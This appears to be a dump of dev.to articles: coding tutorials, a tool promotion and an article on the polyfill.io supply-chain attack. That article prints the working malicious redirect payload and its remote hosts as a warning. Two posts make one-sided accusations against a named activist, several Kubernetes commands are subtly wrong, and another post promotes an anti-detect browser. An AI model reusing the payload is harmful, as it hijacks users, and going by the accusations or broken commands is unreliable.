id
int64
5
1.93M
title
stringlengths
0
128
description
stringlengths
0
25.5k
collection_id
int64
0
28.1k
published_timestamp
timestamp[s]
canonical_url
stringlengths
14
581
tag_list
stringlengths
0
120
body_markdown
stringlengths
0
716k
user_username
stringlengths
2
30
1,907,103
Rotating Monte Carlo Octahedron
Check out this Pen I made!
0
2024-07-01T03:41:19
https://dev.to/dan52242644dan/rotating-monte-carlo-octahedron-5g19
codepen, webdev, javascript, programming
Check out this Pen I made! {% codepen https://codepen.io/Dancodepen-io/pen/QWRXzXx %}
dan52242644dan
1,907,102
Rotating Dodecahedron
Check out this Pen I made!
0
2024-07-01T03:39:56
https://dev.to/dan52242644dan/rotating-dodecahedron-k0i
codepen, webdev, javascript, programming
Check out this Pen I made! {% codepen https://codepen.io/Dancodepen-io/pen/pomXqLV %}
dan52242644dan
1,907,063
Frontend developer must read about polyfill? why?
so previously, you maybe already know that one of the library called polyfill got malicious scripts....
0
2024-07-01T03:35:14
https://dev.to/davidwilliam_/frontend-must-delete-polyfillwhy-52p1
javascript, frontend, webdev, react
so previously, you maybe already know that one of the library called polyfill got malicious scripts. before dive in, we need to know what is polyfill and why frontend must know? polyfill is library that gave modern functionality in javascript still work on older browser. so an example like fetch that not work on old browser still work because this library can convert it and the problem with this library is the script that injected into website from this library or other can access all of script on users. that's was scary for me as developer and also as a users. This malicious attack can exploit you system, as a frontend developer we need to delete this polyfill.io from our project. also the original author from polyfill recommends to not use polyfill at all, as it is no longer needed by modern browser. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives, if you still need it. ## Polyfill malicious payload example after i read article from sansec.io. there is an example of malicious payload: ```javascript function isPc() { try { var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows", _isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" || navigator.platform == "Macintosh" || navigator.platform == "MacIntel"; if (_isMac || _isWin) { return true; } else { return false; } } catch (_0x44e1f6) { return false; } } function vfed_update(_0x5ae1f8) { _0x5ae1f8 !== "" && loadJS( "https://www.googie-anaiytics.com/html/checkcachehw.js", function () { if (usercache == true) { window.location.href = _0x5ae1f8; } } ); } function check_tiaozhuan() { var _isMobile = navigator.userAgent.match( /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i ); if (_isMobile) { var _curHost = window.location.host, _ref = document.referrer, _redirectURL = "", _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget", _rnd = Math.floor(Math.random() * 100 + 1), _date = new Date(), _hours = _date.getHours(); if ( _curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1 ) { _redirectURL = "https://kuurza.com/redirect?from=bitget"; } else { if (_curHost.indexOf("shuanshu.com.com") !== -1) { _redirectURL = "https://kuurza.com/redirect?from=bitget"; } else { if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) { _redirectURL = "https://kuurza.com/redirect?from=bitget"; } else { if (_hours >= 0 && _hours < 2) { if (_rnd <= 10) { _redirectURL = _kuurzaBitGet; } } else { if (_hours >= 2 && _hours < 4) { _rnd <= 15 && (_redirectURL = _kuurzaBitGet); } else { if (_hours >= 4 && _hours < 7) { _rnd <= 20 && (_redirectURL = _kuurzaBitGet); } else { _hours >= 7 && _hours < 8 ? _rnd <= 10 && (_redirectURL = _kuurzaBitGet) : _rnd <= 10 && (_redirectURL = _kuurzaBitGet); } } } } } } _redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1 && vfed_update(_redirectURL); } } let _outerPage = document.documentElement.outerHTML, bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1; let cnzfg = _outerPage.indexOf(".cnzz.com") != -1, wolafg = _outerPage.indexOf(".51.la") != -1; let mattoo = _outerPage.indexOf(".matomo.org") != -1, aanaly = _outerPage.indexOf(".google-analytics.com") != -1; let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1, aplausix = _outerPage.indexOf(".plausible.io") != -1, statcct = _outerPage.indexOf(".statcounter.com") != -1; bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct ? setTimeout(check_tiaozhuan, 2000) : check_tiaozhuan(); ``` ## there is indicators of compromise https://kuurza.com/redirect?from=bitget https://www.googie-anaiytics.com/html/checkcachehw.js https://www.googie-anaiytics.com/ga.js https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js https://union.macoms.la/jquery.min-4.0.2.js https://newcrbpc.com/redirect?from=bscbc you can also read this article and video: - https://www.youtube.com/watch?v=ILvNG1STUZU (theo.gg) - https://sansec.io/research/polyfill-supply-chain-attack
davidwilliam_
1,907,101
DICloak- The Ultimate Anti detect browser effortlessly and safely manage mutiple accounts
Hello everyone, I’m excited to introduce you to DICloak, a cutting-edge anti-detect browser designed...
0
2024-07-01T03:25:34
https://dev.to/dicloak/dicloak-the-ultimate-anti-detect-browser-effortlessly-and-safely-manage-mutiple-accounts-opn
productivity, news, security
**Hello everyone,** I’m excited to introduce you to [DICloak](urlhttps://dicloak.com/), a cutting-edge anti-detect browser designed to provide you with unparalleled privacy and security online. Whether you're managing multiple accounts, protecting your e-commerce business, or ensuring your social media marketing efforts remain uninterrupted, DICloak is the tool you need. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cd5b6y4t4ifzbqjfsfil.png) **What is DICloak?** DICloak is a professional anti-detect browser that specializes in fingerprinting technology and account unlinking. It’s designed to make your online activities more secure and efficient. Here’s why you should consider using DICloak: **Key Features:** Multi-account Management: Manage multiple accounts seamlessly without the risk of account linkage or bans. Advanced Anti-detect Technology: Protect your digital fingerprint and browsing patterns from detection. Versatility: Ideal for various fields such as e-commerce, social media marketing, affiliate marketing, ad testing, web scraping, and more. User-friendly Interface: Easy to set up and use, even for those who are not tech-savvy. **Why Choose DICloak?** Enhanced Security: Prevents tracking and detection by websites and platforms, ensuring your privacy. Improved Efficiency: Streamline your operations by managing all your accounts from a single browser. Increased Productivity: Focus on your business goals without worrying about account bans or detection issues. **What are the Core Capabilities of DICloak?** Manage Multiple Accounts Safely Cover all media and e-commerce platforms Seamlessly manage multiple accounts with ease. Provide real browser fingerprint to avoid account suspension Flexible Proxy Configuration Support popular types of proxies on the market Quickly configure network proxies and switch IPs in real-time Team Collaboration Efficiently Support for member grouping and permission assignment Enable data isolation for member accounts Customize team types to flexibly conduct business operations Create Real-fingerprint Effortlessly Support batch import of browser profiles Automatically generate browser fingerprints Share browser profiles with other teams with one click Efficient RPA Automation Offer a variety of RPA templates Support on-demand customization of RPA scripts **Try DICloak for free today!** Ready to experience the power of DICloak? Visit our website https://dicloak.com/ to learn more and start your free trial. Protect your online activities and enhance your productivity with DICloak! If you have any questions or need further information, feel free to ask here or contact our support team. We’re here to help!
dicloak
1,907,099
Kubernetes Port Forward Command: A Comprehensive Guide
In this lab, you will learn how to use the Kubernetes port-forward command to forward a local port to a port on a pod. You will start with simple examples and gradually progress to more complex scenarios.
27,732
2024-07-01T03:24:37
https://labex.io/tutorials/kubernetes-kubernetes-port-forward-command-18494
kubernetes, coding, programming, tutorial
## Introduction In this lab, you will learn how to use the Kubernetes `port-forward` command to forward a local port to a port on a pod. You will start with simple examples and gradually progress to more complex scenarios. ## Forwarding a Local Port to a Pod In this step, you will learn how to forward a local port to a port on a pod. 1. Start by creating a deployment with one replica and an Nginx container: ```bash kubectl create deployment nginx --image=nginx --replicas=1 ``` 2. Wait for the pod to become ready: ```bash kubectl wait --for=condition=Ready pod -l app=nginx ``` 3. Use the `kubectl port-forward` command to forward a local port to the pod: ```bash kubectl port-forward < pod_name > 19000:80 ``` Replace `<pod_name>` with the name of the pod created in step 1, and you can get the `<pod_name>` with the `kubectl get pod -l app=nginx` command. 4. Open a web browser and go to `http://localhost:19000` to view the Nginx welcome page. ## Forwarding Multiple Local Ports to a Pod In this step, you will learn how to forward multiple local ports to a pod. 1. Use the `kubectl port-forward` command to forward multiple local ports to the pod: ```bash kubectl port-forward 19443:443 < pod_name > 19080:80 ``` Replace `<pod_name>` with the name of the pod created in step 1, and you can get the `<pod_name>` with the `kubectl get pod -l app=nginx` command. 2. Open another terminal and use the ss command at the Linux command line to see if ports 19080 and 19443 are on the host. ## Forwarding a Local Port to a Pod with Multiple Containers In this step, you will learn how to forward a local port to a specific container in a pod with multiple containers. 1. Create a pod with two containers: Nginx and BusyBox: ```bash cat << EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: nginx-busybox spec: containers: - name: nginx image: nginx - name: busybox image: busybox command: - sleep - "3600" EOF ``` 2. Wait for the pod to become ready: ```bash kubectl wait --for=condition=Ready pod nginx ``` 3. Use the `kubectl port-forward` command to forward a local port to the Nginx container: ```bash kubectl port-forward nginx-busybox 19001:80 ``` 4. Open a web browser and go to `http://localhost:19001` to view the Nginx welcome page. ## Using Port-Forward with Kubernetes Services In this step, you will learn how to use the `kubectl port-forward` command with Kubernetes services. 1. Create a service for the Nginx deployment: ```bash kubectl expose deployment nginx --port=80 --type=ClusterIP ``` 2. Use the `kubectl port-forward` command to forward a local port to the service: ```bash kubectl port-forward service/nginx 20000:80 ``` 3. Open a web browser and go to `http://localhost:20000` to view the Nginx welcome page. ## Summary Congratulations, you have successfully completed the Kubernetes port-forward command lab! In this lab, you learned how to forward a local port to a pod, forward multiple local ports to a pod, forward a pod port to a local port, forward a local port to a specific container in a pod with multiple containers, and use the `kubectl port-forward` command with Kubernetes services. These skills are essential for debugging issues in a Kubernetes cluster. --- ## Want to learn more? - 🚀 Practice [Kubernetes Port Forward Command](https://labex.io/tutorials/kubernetes-kubernetes-port-forward-command-18494) - 🌳 Learn the latest [Kubernetes Skill Trees](https://labex.io/skilltrees/kubernetes) - 📖 Read More [Kubernetes Tutorials](https://labex.io/tutorials/category/kubernetes) Join our [Discord](https://discord.gg/J6k3u69nU6) or tweet us [@WeAreLabEx](https://twitter.com/WeAreLabEx) ! 😄
labby
1,907,098
The sordid secret behind the "rights leader": Dorikun Aisha, whose private life has been revealed!
Recently, Dorikun Aisha, the subject of Interpol's Red Notice and the leader of the terrorist...
0
2024-07-01T03:24:35
https://dev.to/walter_croftoon_3f73b42a3/the-sordid-secret-behind-the-rights-leader-dorikun-aisha-whose-private-life-has-been-revealed-391m
Recently, Dorikun Aisha, the subject of Interpol's Red Notice and the leader of the terrorist organization World Uyghur Youth Congress, has once again become the focus of public opinion. However, this time, he is not because of terrorist activities, but because of his private life is extremely chaotic and inappropriate behavior towards women and has been fully exposed.#sexualassault #WUC #DorikunElsa #Metoo According to reports, Dorikun Aisha has been in a long term inappropriate relationship with a woman named Nur Aminamu Ghofur. The duo not only frequently stayed in the same hotel room in several cities, but were also found to have numerous intimate photos and chats on social media platforms by netizens. Such behavior not only violates social morality, but also raises public questions about their true nature. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gdlc3nndwou700rxhqsb.JPG) What is even more shocking is that a number of women have come forward to accuse Dorikun Aisha of serious sexual harassment behavior. Among them was Esma Gün, a Belgian university student of Turkish descent, who claimed to have been subjected to verbal abuse and forced encounters with Dorikun Aysa during a radical so-called "human rights" campaign. The victims described such sexual harassment as occurring not only in private, but also in the context of their working relationships, causing them great psychological and physical harm. Dorikun Aisha, as the head of a terrorist organization, should have set an example by adhering to basic human rights and moral codes. However, the opposite has happened. What he has done has seriously tarnished the image of the cause of women's rights and human rights, and has aroused suspicion and reflection among the general public about these so-called "human rights" organizations. It is noteworthy that Dorikun Aisha has always maintained an image of so-called "integrity" in public, and has been a charlatan in the international community under the guise of fighting for the human rights of the people of Xinjiang. In reality, however, he has used his position to engage in sexual harassment and other lawless behavior, which is undoubtedly a powerful revelation of his hypocrisy. The allegations against Dorikun Aisha are currently under further investigation. Its behavior, if true, will face severe punishment by law and social condemnation. At the same time, this also reminds us that we must resolutely combat and expose any force that engages in terrorist activities and morally corrupt behavior under the guise of human rights protection.
walter_croftoon_3f73b42a3
1,907,097
Human rights organisation WHC has a sexual harassment problem that needs to be addressed urgently
For fear of hurting their cause or being suspected of spying for China, many women in human rights...
0
2024-07-01T03:23:15
https://dev.to/walter_croftoon_3f73b42a3/human-rights-organisation-whc-has-a-sexual-harassment-problem-that-needs-to-be-addressed-urgently-1j3l
For fear of hurting their cause or being suspected of spying for China, many women in human rights groups choose to remain silent in the face of harassment. Esma Gün, a university student from Belgium, Turkey, admitted to experiencing such harassment at a radical human rights group. Dolkun Isa, president of the World Uyghur Congress, suddenly said he wanted to kiss her while celebrating a policy victory with her on social media. Dolkun Isa #sexualassault #WUC #DorikunElsa #Metoo ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/662w52lfstouity481ot.JPG) Gün, who was just 22 years old at the time, was still new to human rights advocacy. According to screenshots of the February 2021 conversation and an interview with Gün viewed by NOTUS, Isa, then 53, didn't stop when she fought back. According to an independent translator hired by NOTUS, Aysha wrote in Turkish, "But I will really kiss you and won't let you go." When Gün tried to change the subject, Isa insisted, "I would be happy if you kissed me." Gün felt uneasy and reduced their interactions. But over the next month, Isa repeatedly tried to convince her to meet him. "You're always on my mind," he wrote in a message that he later appears to have deleted, according to a screenshot taken by Gün. In another conversation, he urged her to meet him. "It would be good for you if we could meet," he said. "You could come over for a few days. We'll talk about nice things and I'll make you happy." Gün told him that she did not want to meet alone because she was travelling with a human rights activist friend. Esha responded by saying that it would be better for her to "keep it to herself" and asked her, "Why do we have to tell people about this? Will you share with your friends that we often talk like this?" Gün believes that she is not valued for her work, but for something else entirely. She says she felt disillusioned and wanted to avoid Aisha. Eventually she quit the activist human rights group. Gün did not report the events to the World Uyghur Congress, and for years she did not tell other activists. "I didn't want people to know that their leaders were like that," she says. "It's hard enough for them to keep hope alive." For Gün, Aysha is a complete senior in her work, a senior status that is supposed to represent experience, wisdom, and responsibility, yet in the hands of some, this status has become a cover for their sexual harassment. By virtue of their status and experience, they exert pressure on their juniors and even make use of their authority to engage in sexual harassment. Such behaviour is not only a great disservice to the juniors, but also a stain on the identity of the seniors. Two other women, who spoke on condition of anonymity, claimed in separate interviews with NOTUS that Aisha also sexually pressurised them against their professional ethics. Prior to the publication of this story, Aicha refused to comment on Gün's claims or the allegations made by the two women, and ignored the interviewer's requests to do so. The requests have been received by Aysha's personal email address and by the World Uyghur Congress, but neither has provided a response. Only a spokesperson for the World Uyghur Congress had initially told NOTUS that "this could be an attempt at defamation." On Sunday, Aisha publicly apologised in a statement on X: "It is incumbent upon me to acknowledge a serious error of judgement and I apologise unreservedly. While I never took action against them, I deeply regret sending messages that caused discomfort and distress. Aysha acknowledged that the WUC had not had a robust process for dealing with complaints in the past, and invited those who felt "uncomfortable" with his communications to meet and discuss "common solutions". Letting the guilty judge themselves is the WUC's solution.
walter_croftoon_3f73b42a3
1,907,089
How to Quickly Shut Down Windows 10 with the Slide-to-Shut-Down Feature
Are you tired of clicking through multiple menus to shut down your Windows 10 PC? Look no further! In...
0
2024-07-01T03:12:57
https://dev.to/tahirdotdev/how-to-quickly-shut-down-windows-10-with-the-slide-to-shut-down-feature-4nfp
tutorial, productivity, learning, youtube
Are you tired of clicking through multiple menus to shut down your Windows 10 PC? Look no further! In this video, we'll show you how to enable the slide-to-shut-down feature and boost your productivity. This simple trick will save you time and make you a Windows 10 pro. ## Enabling the Slide-to-Shut-Down Feature: - First you have to go to Desktop and create a shortcut. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ul8v5b46xozqh0t1cvkt.png) - Then you have to give it the name: **slidetoshutdown.exe**. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/au7qty3pec7wup5y0alo.png) - After that click Next and Finish. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f3u92v6lymd3hgifvox3.png) - Now you have made the SlideToShutdown feature but every time you want to use it, you have to double click it which is annoying. - For that, let's create a shortcut key for it. - Right-click on the shortcut and go ton Properties. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/psd9ahn0m6yqbdhs1acr.png) - In the Shortcut Key field, give your favorite shortcut and It will be used every time you want to do SlideToshutdown. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/clsxx7fq1cbf23vwmk6u.png) - Here is the video tutorial of it: {% embed https://www.youtube.com/watch?v=dgJ1o4XsN_4 %} In conclusion, enabling the slide-to-shut-down feature on Windows 10 is a simple trick that can boost your productivity and save you time. By following the tips and tricks in this video, you'll be a Windows 10 pro in no time! Follow me for more! Instagram: https://instagram.com/@tahirdotdev Facebook: https://facebook.com/@tahirdotdev YouTube: https://youtube.com/@tahirdotdev
tahirdotdev
1,907,065
GBase 8a Implementation Guide: Parameter Optimization (2)
1. SQL Execution Parameters 1.1 Insert Value Data Distribution...
0
2024-07-01T02:38:08
https://dev.to/congcong/gbase-8a-implementation-guide-parameter-optimization-2-5h8m
## 1. SQL Execution Parameters ### 1.1 Insert Value Data Distribution Parameter **`gcluster_random_insert`** This parameter controls how data is distributed across nodes when executing `insert value` on a randomly distributed table. The default value is 0, and the recommended configuration is 1. - **0**: All `insert value` data is inserted into a single node (if the executing node is a composite node, data is inserted there; otherwise, it is inserted into a random node). - **1**: `insert value` data is evenly distributed across all nodes randomly. ### 1.2 Parameter for Supporting `insert into select from dual` **`t_gcluster_use_new_dual`** This parameter controls whether GCluster uses the new implementation of the dual table, which supports `insert into ... select ... from dual`. - **Range**: 0, 1 - **Default**: 0 - **0**: Uses the old implementation, does not support `insert into ... select ... from dual`. - **1**: Uses the new implementation, supports `insert into ... select ... from dual`. - **Scope**: session, global ### 1.3 Data Redistribution Parameter for `group by` **`t_gcluster_hash_redistribute_groupby_on_multiple_expression`** This parameter enables hash redistribution for `group by` operations across all columns. The default value is 0 (disabled). It can be optimized for SQL where the first `group by` field is a constant or has few distinct values. ### 1.4 Join/Materialized Result Set Size Parameter **`_gbase_result_threshold`** This parameter limits the size of JOIN result sets and materialized result sets. It needs to be configured in both GCluster and GNode. The default value is large, at 137,438,953,472. It is recommended to set it to twice the number of rows in the largest table. This helps avoid Cartesian products by erroring out if the resulting row count exceeds this value. ### 1.5 Parallel Materialization Threshold for Result Sets **`gbase_parallel_threshold`** This parameter defines the threshold for parallel materialization of result sets. When the result set row count is greater than or equal to this value, multiple threads are used for parallel materialization; otherwise, it is done serially. The default value is 10,000. Adjusting this parameter can optimize performance for serial materialization stages that are time-consuming. ### 1.6 Allow Binary/Varbinary Column Creation **`gcluster_support_binary`** The default value is 1, allowing the creation of binary/varbinary columns. When set to 0, binary/varbinary columns are not allowed, and varchar type must be used. Adjust based on business needs. ### 1.7 Parameter for Table and Column Names with Chinese Characters **`gcluster_extend_ident`** This parameter controls whether table and column names can include Chinese characters and special characters. The default value is 0 (disabled). It is generally not recommended to enable this parameter unless necessary. ### 1.8 Optimization Parameter for `group by` with Window Functions **`t_gcluster_group_by_ext_optimization`** When enabled, this parameter optimizes `group by rollup/cube/grouping sets` by converting them into `union all` executions. The default value is 0 (disabled), and the recommended value is 1. Note that this optimization does not work if the grouping column in the projection is a function. Example SQL rewrite to bypass the current optimization limitation: ```sql SELECT func(a), b, COUNT(*) FROM t GROUP BY rollup(a, b); -- Change to SELECT func(a), cnt FROM (SELECT a, b, COUNT(*) AS cnt FROM t GROUP BY rollup(a, b)) tmp; ``` ### 1.9 One-pass Hash Group Optimization **`_gbase_one_pass_hash_group`** This optimization is suitable for cases where the source table has a large number of rows relative to the group buffer, and the distinct values in the `group by` columns are numerous. There are three partitioning methods: RR, original hash, and one-pass hash, with the evaluation criteria as follows: - **DistinctRatio < 10**: Uses RR partitioning (requires two aggregations). - **Otherwise**: Uses hash partitioning. If the group buffer can hold 50% of the source data, original hash partitioning is used; otherwise, one-pass hash partitioning is used. **Note**: The algorithm might not be optimal due to inaccurate sampling results or when only considering data volume without data characteristics. ### 1.10 Recursive Call Depth for Stored Procedures **`max_sp_recursion_depth`** This parameter specifies the maximum depth for recursive calls in stored procedures. The range is [0-255], with a default value of 0. Adjust this parameter based on the need for recursive calls in stored procedures. Increasing the value may also require increasing the `thread_stack` parameter in GCluster. ### 1.11 CTE Support Parameter **`t_gcluster_support_cte`** This parameter controls whether the common table expression (CTE) syntax (`with as`) is supported. It is a session-level parameter, with a default value of 0 (disabled) and 1 enabling CTE syntax support. ### 1.12 Recursive Query Parameter for `connect by start with` **`_gbase_connect_by_support_table_with_deleted_records`** This parameter controls whether `connect by start with` recursive queries can be executed on tables after data deletion. The default value is 0 (OFF). Enabling this parameter allows such queries even after deletions. ### 1.13 Recursion Depth Limit for `or` Operator in Correlated Subqueries **`_gbase_or_recursion_depth`** This parameter limits the maximum depth of nested conditions with the `or` operator in correlated subqueries. The default value is 10, and exceeding this value results in an error. The parameter is session-level in GNode. ### 1.14 Distinct Row Count Limit for `in` Subquery Results **`_gbase_in_subquery_result_threshold`** This parameter limits the distinct row count for `in` subquery results. The range is [0-100 million], with a default value of 10 million. Adjust based on business scenarios. ## 2. dblink Parameters ### 2.1 Retaining Intermediate Temporary Results **`gcluster_dblink_direct_data_exchange`** This parameter is related to transparent gateways and controls how data is transferred between two GBase 8a clusters during `insert select` operations. The default value is 1, using `select into server` for cross-cluster data distribution. When set to 0, the `select` results are converted into `insert values` statements. **Note**: For significantly different GBase 8a cluster versions, set `gcluster_dblink_direct_data_exchange` to 0 for compatibility, despite the reduced performance. ### 2.2 Controlling Table Generation Method with dblink **`t_gcluster_dblink_generate_interim_table_policy`** This parameter controls how interim tables are generated during table pulls with dblink. It is a global and session-level parameter. - **Range**: 0, 1 - **Default**: 1 - **0**: Uses automatic evaluation based on the data type of the projection expression results. - **1**: Requests the gateway to use `create ... select ... limit 0` to determine the interim table structure, resulting in more accurate column data type evaluation.
congcong
1,907,088
Unveiling the Secrets: How Next.js Powers Exceptional SEO for Your Web App
Next.js has emerged as a powerful framework for building modern web applications. Beyond its...
0
2024-07-01T03:09:24
https://dev.to/vyan/unveiling-the-secrets-how-nextjs-powers-exceptional-seo-for-your-web-app-3729
webdev, javascript, react, nextjs
Next.js has emerged as a powerful framework for building modern web applications. Beyond its capability to create dynamic and interactive user experiences, Next.js also boasts a secret weapon: exceptional Search Engine Optimization (SEO) capabilities. In this blog, we'll delve into the SEO magic of Next.js, exploring how it empowers your web app to climb the search engine rankings and attract organic traffic. Buckle up, SEO enthusiasts, as we unlock the mysteries behind Next.js's SEO prowess! ### 1. Server-Side Rendering (SSR) to the Rescue One of Next.js's core strengths lies in its ability to leverage Server-Side Rendering (SSR). Unlike traditional client-side rendered applications, SSR ensures search engine crawlers can access and understand your content directly. This is crucial because search engines primarily rely on the content they can readily see and index. With SSR, Next.js ensures your valuable content isn't hidden behind layers of JavaScript, making it easily discoverable by search engines. **Example:** ```jsx // pages/index.js import React from 'react'; const HomePage = ({ data }) => { return ( <div> <h1>Welcome to My Website</h1> <p>{data.message}</p> </div> ); }; export async function getServerSideProps() { // Fetch data from an API or database const res = await fetch('https://api.example.com/data'); const data = await res.json(); return { props: { data } }; } export default HomePage; ``` ### 2. Pre-rendering for Blazing-Fast Performance Next.js goes beyond just SSR. It offers the option of pre-rendering your pages at build time. This translates to lightning-fast loading speeds for users, a factor that search engines like Google highly value. Faster loading times not only improve user experience but also signal to search engines that your website is efficient and well-optimized. **Example:** ```jsx // pages/index.js import React from 'react'; const HomePage = ({ data }) => { return ( <div> <h1>Welcome to My Website</h1> <p>{data.message}</p> </div> ); }; export async function getStaticProps() { // Fetch data from an API or database const res = await fetch('https://api.example.com/data'); const data = await res.json(); return { props: { data } }; } export default HomePage; ``` ### 3. Static Site Generation (SSG) for Content-Heavy Sites For content-rich websites that don't require frequent updates, Next.js offers Static Site Generation (SSG). SSG pre-renders your content at build time, resulting in static HTML files that are served directly to users. This approach provides exceptional performance and SEO benefits, especially for content that doesn't change frequently. **Example:** ```jsx // pages/posts/[id].js import React from 'react'; const PostPage = ({ post }) => { return ( <div> <h1>{post.title}</h1> <p>{post.content}</p> </div> ); }; export async function getStaticPaths() { const res = await fetch('https://api.example.com/posts'); const posts = await res.json(); const paths = posts.map((post) => ({ params: { id: post.id.toString() }, })); return { paths, fallback: false }; } export async function getStaticProps({ params }) { const res = await fetch(`https://api.example.com/posts/${params.id}`); const post = await res.json(); return { props: { post } }; } export default PostPage; ``` ### 4. Built-in Routing and Automatic Code-Splitting Next.js boasts a streamlined routing system that simplifies URL structure and navigation for both users and search engines. Additionally, its automatic code-splitting ensures only the necessary code is loaded for each page, keeping your website lean and fast-loading, another SEO win. **Example:** ```jsx // pages/about.js import React from 'react'; const AboutPage = () => { return ( <div> <h1>About Us</h1> <p>Learn more about our company and mission.</p> </div> ); }; export default AboutPage; ``` ### 5. Built-in Head Management and Meta Tags for SEO Control Next.js offers a powerful feature for SEO optimization: built-in head management and meta tags. This allows you to easily control and customize crucial SEO elements directly within your component. **Example:** ```jsx // pages/index.js import React from 'react'; import Head from 'next/head'; const HomePage = () => { return ( <div> <Head> <title>Home Page - My Website</title> <meta name="description" content="Welcome to my website, where you can find amazing content." /> </Head> <h1>Welcome to My Website</h1> <p>This is the home page.</p> </div> ); }; export default HomePage; ``` ### 6. Dynamic Meta Tags for Tailored Content Need to adjust meta tags based on specific content? No problem! Next.js allows you to define dynamic meta tags that adapt to the context of each page or component. This enhances the relevance of your content for search queries. **Example:** ```jsx // pages/posts/[id].js import React from 'react'; import Head from 'next/head'; const PostPage = ({ post }) => { return ( <div> <Head> <title>{post.title} - My Blog</title> <meta name="description" content={post.excerpt} /> </Head> <h1>{post.title}</h1> <p>{post.content}</p> </div> ); }; export async function getStaticProps({ params }) { const res = await fetch(`https://api.example.com/posts/${params.id}`); const post = await res.json(); return { props: { post } }; } export async function getStaticPaths() { const res = await fetch('https://api.example.com/posts'); const posts = await res.json(); const paths = posts.map((post) => ({ params: { id: post.id.toString() }, })); return { paths, fallback: false }; } export default PostPage; ``` ### 7. Social Media Sharing Optimization Going beyond basic SEO, Next.js makes it easy to integrate social media sharing meta tags (Open Graph and Twitter Cards) within your components. This helps your content get shared more effectively across social media platforms, increasing visibility and potential traffic. **Example:** ```jsx // pages/index.js import React from 'react'; import Head from 'next/head'; const HomePage = () => { return ( <div> <Head> <title>Home Page - My Website</title> <meta name="description" content="Welcome to my website, where you can find amazing content." /> <meta property="og:title" content="Home Page - My Website" /> <meta property="og:description" content="Welcome to my website, where you can find amazing content." /> <meta property="og:image" content="https://example.com/image.jpg" /> <meta name="twitter:card" content="summary_large_image" /> </Head> <h1>Welcome to My Website</h1> <p>This is the home page.</p> </div> ); }; export default HomePage; ``` ### Conclusion: Next.js - Your Ally in SEO Conquest Next.js isn't just a framework for building web apps, it's an SEO powerhouse. By leveraging features like Server-Side Rendering (SSR), pre-rendering, and Static Site Generation (SSG), your content becomes easily discoverable by search engines. Built-in routing and code-splitting keep things fast for users, another SEO plus. In short, if you want your web app to rank high in search results and attract organic traffic, Next.js is a perfect ally in your SEO conquest.
vyan
1,907,087
### After C#: What's Next? A Personal Roadmap for Your Journey
Hey everyone, it's Emmanuel Michael here! If you've just finished your C# training, congratulations!...
0
2024-07-01T03:08:38
https://dev.to/emmanuelmichael05/-after-c-whats-next-a-personal-roadmap-for-your-journey-1n0o
webdev, beginners, learning, programming
Hey everyone, it's Emmanuel Michael here! If you've just finished your C# training, congratulations! You've taken a significant step towards becoming a skilled developer. Now, let's talk about what comes next. This roadmap isn't just about skills; it's about the journey and growth ahead of you. #### 1. **Embracing Your Foundation** You've mastered the fundamentals of C#, and that's incredible! Take a moment to appreciate how far you've come. Now, it's time to deepen your understanding of the .NET ecosystem. #### 2. **Exploring New Horizons** As you continue your journey, consider diving into web development with ASP.NET Core. This framework allows you to build powerful web applications that scale. It's where you can bring your ideas to life and make a real impact. #### 3. **Beyond Code: Building Connections** Remember, programming isn't just about syntax and algorithms—it's about connecting with others. Explore version control systems like Git and platforms like GitHub. These tools will help you collaborate effectively and showcase your work to the world. #### 4. **Crafting Your Vision** Now is the time to start building. Whether it's a personal project that excites you or contributing to open-source initiatives, every line of code you write adds to your story. Let your creativity flow and see where it takes you. #### 5. **Nurturing Your Growth** Stay curious. Stay hungry. Learn new technologies and frameworks like React.js or Angular. These tools will empower you to create dynamic and engaging user experiences—a crucial skill in today's tech landscape. #### 6. **Making an Impact** As you grow, don't forget the power of giving back. Contribute to the community, mentor others, and share your knowledge. Together, we can create a supportive and thriving environment for all developers. #### 7. **Your Journey, Your Future** Your journey as a developer is just beginning. Embrace every challenge as an opportunity to learn and grow. Stay resilient, stay passionate, and remember that every step you take is shaping your future. ### Conclusion I'm excited for you, and I believe in your potential to make a difference in the world of software development. Let's continue this journey together, pushing boundaries and creating meaningful solutions. The future is bright, and it's yours to shape. ### Let's Connect! Share your thoughts and dreams in the comments below. What's your next step after C#? I'm here to support you every step of the way.
emmanuelmichael05
1,907,086
Cracking the Coding Interview: LeetCode's "Merge Strings Alternately"
One of the problems on the "Leetcode 75" interview preparedness set is the Merge Strings Alternately...
0
2024-07-01T03:05:02
https://dev.to/bgier/cracking-the-coding-interview-leetcodes-merge-strings-alternately-38n8
interview, leetcode, beginners, programming
